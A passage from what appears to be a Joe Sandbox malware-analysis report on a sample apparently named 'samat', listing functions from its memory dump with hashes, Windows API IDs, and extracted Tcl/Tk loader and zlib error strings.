                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1E04652F086828BFB113AA58C8B37890684FE5340FD00432E908062C3DDBC6884A233
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(?,?,?,00007FF7E12D0C90,?,?,?,00007FF7E12D22FA,?,?,?,?,?,00007FF7E12D3AE9), ref: 00007FF7E12DD63A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AllocHeap
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4292702814-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                                                                      • Instruction ID: 6e2baa4037b2b19c620ba4ac7aeafc4a5e396838dfde7811840410d8a8b2229c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28F05E12F0C64A4AFF553771AC03375929C5F887A0F884732DD2E852C5DEBCB48081B2
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                                                      • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                                                      • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                                                                      • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                                                                      • Instruction ID: b7218dcfee3b163d06d2ccc0e6fc4f2aface9758e9a0294c1fdaf2dc1092c870
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D02D520B09B0B82EF16BB55EC163B4A3A9BF14744FD09137D52E46260EFBDB149C232
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                                      • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                                                                      • Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                                                                                      • Instruction ID: f743e55af4af634fea1fd10122f670f1e80f558488bce56972e4488ddd388fa6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2B2E772F182C28BE7269F64D8417FDB7A9FB54348F809136DA0DD7A84DBB8A500CB51
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                                                                                      • API String ID: 0-2665694366
                                                                                                                                                                                                                                                                                      • Opcode ID: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
                                                                                                                                                                                                                                                                                      • Instruction ID: a040e07336edb6e667488ce7824d336e6526e31e28788d4cd26e9364b057f630
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1521472B146A64BD7A49F14C859BBE7BADFB44340F51413AE74A83780EBBDD800CB51
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3140674995-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                                                                      • Instruction ID: da7d22fd89f193bd324d2f6b7ffb245b114b81ec7e29bfa21c2b7e0aa29bb85c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C313D72709B8586EB619F60E8813EEB364FB84704F44403BDA4E57B99DFB8D548C721
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1239891234-0
                                                                                                                                                                                                                                                                                      • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                                                                      • Instruction ID: 84ae083db916b73a3733ca75b8e9d0c1cd0b6ab5210fd16ecbf27b7c1088da8e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06317E32708B8186EB219B25EC417AEB3A8FB88754F944136EA8D47B54DF7CC145CB11
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2227656907-0
                                                                                                                                                                                                                                                                                      • Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                                                                      • Instruction ID: 068de04bf61d9c0822f8e4dbc7e7ab4d78100c12cb94ced40b438c1c9ad3aafc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0BB1B922B1868241EF62AB21DD027B9E398EB44BE4F849137D95D877C5EEBCE441D313
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                                                                      • Instruction ID: f60843e89d54832239beb224f4aa960a89cfab9a1133ce52a4245f55b401e2a9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C114F22B14B068AEB009B60EC453A973A8FB19758F440E36DA2D967A4DF78D1548351
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcpy_s
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1502251526-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                                                                      • Instruction ID: 713b0094705db19463e742113014821ab77241ddace96fd03e16f436a548b779
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 36C10372B1828687D725DF1AE44576AFBA5FB98B84F84C136DB4A83744DB7DE800CB40
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                                                                                      • API String ID: 0-1127688429
                                                                                                                                                                                                                                                                                      • Opcode ID: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
                                                                                                                                                                                                                                                                                      • Instruction ID: 79280f5de30c6dec9e4d93a764b9a01ba98bd3e8dbeaaf76f46c0bdb1e2e3472
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10F1A172B083C58BE7A5AB14C889B3EBAADFF44740F55453ADB4947390EBB8E840C751
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 15204871-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                                                                                                                                                      • Instruction ID: a5ceb7728132f769c6de830a930919b72e15b45cf39dbe1d7d8021e09835ad15
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00B16B73A04B898BEB1ACF29C846368BBA4F744B48F54C923DA5E837A4CB79D451C711
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: $
                                                                                                                                                                                                                                                                                      • API String ID: 0-227171996
                                                                                                                                                                                                                                                                                      • Opcode ID: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                                                                                                                                                                                                      • Instruction ID: 457cddd06ff7b9263468ba4f28eeb5228762136aba8e49f6b303ca1b1a111d10
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20E1D7B3B0864285E768AF25C85223DB3A8FF45B48F948137DA4E07794DFB9E851C712
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                                                                                      • API String ID: 0-900081337
                                                                                                                                                                                                                                                                                      • Opcode ID: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
                                                                                                                                                                                                                                                                                      • Instruction ID: f2c23c3aeab695a92ba28ea3b8554688c849d50a7491c0b58db1530ac16a2543
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA91B772B182C587E7A49B14C849B7E7AADFF44390F51413ADB4A477C0DB79E540CB12
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: e+000$gfff
                                                                                                                                                                                                                                                                                      • API String ID: 0-3030954782
                                                                                                                                                                                                                                                                                      • Opcode ID: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                                                                                                                                                      • Instruction ID: a08ecce26d999c36c93c4f8293561efca95e520f5088f5c502c7f1daead1a9bb
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87516663B186C586E7259E35DC02769EB99E744B94F888233CBAC4BAC5CFBDD000C712
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
